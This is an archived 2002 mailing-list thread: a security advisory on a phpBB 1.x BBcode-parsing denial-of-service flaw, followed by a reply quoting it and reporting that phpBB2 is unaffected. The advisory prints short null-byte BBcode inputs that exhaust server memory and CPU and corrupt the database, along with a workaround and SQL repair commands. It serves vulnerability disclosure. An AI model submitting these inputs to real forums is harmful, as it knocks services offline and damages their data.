From security@whitecell.org Fri Apr 5 00:55:48 2002 From: Whitecell Security Systems To: "vulnwatch@vulnwatch.org" Date: Thu, 4 Apr 2002 21:21:57 +0800 Subject: [VulnWatch] (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability [The following text is in the "GB2312" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability Release infomation ------------------ Release Date: 2001-4-4 Author: By Whitecell Security Systems(WSS) tombkeeper (tombkeeper@whitecell.org) alert7 (alert7@whitecell.org) Homepage: http://www.whitecell.org/ Impact: -------- WSS has found a vulnerability in PHPBB when PHPBB process BBcode,which could enbale one user D.O.S system and destroy PHPBB databases. Affected Versions -------------------- phpBB Group phpBB 1.4.4 phpBB Group phpBB 1.4.2 phpBB Group phpBB 1.4.1 phpBB Group phpBB 1.4.0 phpBB Group phpBB 1.2.1 phpBB Group phpBB 1.2.0 phpBB Group phpBB 1.0.0 ---------------------------- NOT TEST: phpBB Group phpBB 2.x Description: ------------ phpbb support nesting BBcode [code][/code],[quote][/quote],[list][/list]. Unfortunately,there is a mistake when process BBcode in functions.php . Exploit: ---------- 一: submit the following poster: [code] \0\0\0\0\0\0\0 [/code] In fact, the following data have saved to database after BBcode process. [1code] \0\0\0\0\0\0\0 [/code1][1code] \0\0\0\0\0\0\0 [/code1][1code] \0\0\0\0\0\0\0 [/code1][1code] \0\0\0\0\0\0\0 [/code1][1code] \0\0\0\0\0\0\0 [/code1][1code] \0\0\0\0\0\0\0 [/code1][1code] \0\0\0\0\0\0\0 [/code1] 二: submit the following poster: [code]'\0'*800[/code] see system whitecell$ top PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME COMMAND 8643 nobody 13 0 212M 81M 13604 D 8.0 65.7 0:07 httpd phpbb error message: Could not enter post text! but in fact ,Two data have alreay saved to databases.Now, the database is uncompleted.If you brower the forum to see which you post,phpbb could report message:"Could not connect to the forums database." 三: submit 49 bytes data: [code]\0[code]\0[code]\0[/code]\0[/code]\0[/code] type top to see cpu: PID USER PRI NI SIZE RSS SHARE STAT %CPU %MEM TIME COMMAND 25741 nobody 14 0 11828 9996 416 R 99.9 7.8 2:38 httpd Experiment environment:linux 2.4.10 Apache/1.3.23 PHP 4.1.2 Vendor -------- http://www.phpbb.com Workaround: ----------- 1:disale BBcode until Vendor fixed. 2:modify functions.php bbencode_code() function bbencode_code($message, $is_html_disabled) { $message = preg_replace("/\[code\](.*?)\[\/code\]/si", "
Code:
\\1
", $message); return $message; } // bbencode_code() REPAIR DATABASE: if url is http://host/forums/viewtopic.php?topic=1162&forum=1&0 you can use the following command to repair it : whitecell$ mysql -uuser -ppasswd mysql> use databasename; mysql> select * from topics where topic_id = 1162; //GET post_id mysql> delete from posts where post_id = 6280; mysql> delete from posts_text where post_id = 6280; mysql> delete from topics where topic_id = 1162; ABOUT WSS: ------------ WSS is a non-profit and free technology organization . We are devoting to research and demonstration of weaknesses related to network services , communication security and system security. Copyright 2002 http://www.whitecell.org/ All rights reserved. From delusi0n@bellsouth.net Fri Apr 5 01:18:55 2002 From: "<-delusion->" To: security@whitecell.org, bugtraq@securityfocus.com, vuln-dev@securityfocus.com Date: Thu, 4 Apr 2002 17:23:46 -0500 Subject: Re: (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability [The following text is in the "GB2312" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] This particular vulnerability does not work on phpBB2. I tested it out by posting with [code]"800 \0's goes here"[/code], and it just shows the code which was 800 \0's in the post. Nothing bad happened to the database or the processes. So this vulnerabilty does not work on phpBB2 forums. -delusion http://www.digital-delusions.com ----- Original Message ----- From: "Whitecell Security Systems" To: ; Sent: Thursday, April 04, 2002 8:23 AM Subject: (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability > (WSS-Advisories-02003) PHPBB BBcode Process Vulnerability > > > Release infomation > ------------------ > > Release Date: 2001-4-4 > Author: By Whitecell Security Systems(WSS) > tombkeeper (tombkeeper@whitecell.org) > alert7 (alert7@whitecell.org) > Homepage: http://www.whitecell.org/ > > > Impact: > -------- > > WSS has found a vulnerability in PHPBB when PHPBB process BBcode,which could > enbale one user D.O.S system and destroy PHPBB databases. > > > Affected Versions > -------------------- > > phpBB Group phpBB 1.4.4 > phpBB Group phpBB 1.4.2 > phpBB Group phpBB 1.4.1 > phpBB Group phpBB 1.4.0 > phpBB Group phpBB 1.2.1 > phpBB Group phpBB 1.2.0 > phpBB Group phpBB 1.0.0 > ---------------------------- > > NOT TEST: > phpBB Group phpBB 2.x > > > Description: > ------------ > > phpbb support nesting BBcode [code][/code],[quote][/quote],[list][/list]. > Unfortunately,there is a mistake when process BBcode in functions.php . > > > Exploit: > ---------- > > 一: > submit the following poster: > > [code] > \0\0\0\0\0\0\0 > [/code] > > In fact, the following data have saved to database after BBcode process. > > [1code] > \0\0\0\0\0\0\0 > [/code1][1code] > \0\0\0\0\0\0\0 > [/code1][1code] > \0\0\0\0\0\0\0 > [/code1][1code] > \0\0\0\0\0\0\0 > [/code1][1code] > \0\0\0\0\0\0\0 > [/code1][1code] > \0\0\0\0\0\0\0 > [/code1][1code] > \0\0\0\0\0\0\0 > [/code1] > > 二: > submit the following poster: > [code]'\0'*800[/code] > > see system > whitecell$ top > PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND > 8643 nobody 13 0 212M 81M 13604 D 8.0 65.7 0:07 httpd > > phpbb error message: > Could not enter post text! > > but in fact ,Two data have alreay saved to databases.Now, the database > is uncompleted.If you brower the forum to see which you post,phpbb could > report message:"Could not connect to the forums database." > > 三: > submit 49 bytes data: > > [code]\0[code]\0[code]\0[/code]\0[/code]\0[/code] > > type top to see cpu: > PID USER PRI NI SIZE RSS SHARE STAT TIME COMMAND > 25741 nobody 14 0 11828 9996 416 R 99.9 7.8 2:38 httpd > > Experiment environment:linux 2.4.10 Apache/1.3.23 PHP 4.1.2 > > > Vendor > -------- > > http://www.phpbb.com > > > Workaround: > ----------- > > 1:disale BBcode until Vendor fixed. > 2:modify functions.php bbencode_code() > > function bbencode_code($message, $is_html_disabled) > { > $message = preg_replace("/\[code\](.*?)\[\/code\]/si", "
Code:
\\1
", $message); > return $message; > > } // bbencode_code() > > REPAIR DATABASE: > if url is http://host/forums/viewtopic.php?topic=1162&forum=1&0 > you can use the following command to repair it : > whitecell$ mysql -uuser -ppasswd > mysql> use databasename; > mysql> select * from topics where topic_id = 1162; //GET post_id > mysql> delete from posts where post_id = 6280; > mysql> delete from posts_text where post_id = 6280; > mysql> delete from topics where topic_id = 1162; > > > ABOUT WSS: > ------------ > > WSS is a non-profit and free technology organization . We are devoting to > research and demonstration of weaknesses related to network services , > communication security and system security. > > > Copyright 2002 http://www.whitecell.org/ All rights reserved. >